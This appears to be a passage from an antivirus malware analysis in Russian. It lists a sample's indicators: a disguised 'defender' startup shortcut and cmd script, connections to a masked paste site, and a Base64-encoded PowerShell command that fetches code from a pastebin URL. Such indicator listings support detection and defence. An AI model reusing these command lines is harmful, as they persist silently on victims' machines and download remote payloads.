Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\defender.lnk
- %TEMP%\ixp000.tmp\defender.cmd
- 'pa###bin.com':443
- 'pa###bin.com':443
- DNS ASK pa###bin.com
- '<SYSTEM32>\cmd.exe' /c %TEMP%\IXP000.TMP\Defender.cmd' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c %TEMP%\IXP000.TMP\Defender.cmd
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encoded JABkAG8AdwBuAGwAbwBhAGQAcwB0AHIAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAEEATABmAGEAZgAyAFgASAAiACAAIwBjAG8AbgB0AHIAbwBsAGwAZQByACAAcwB0AHIADQAKACQA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /c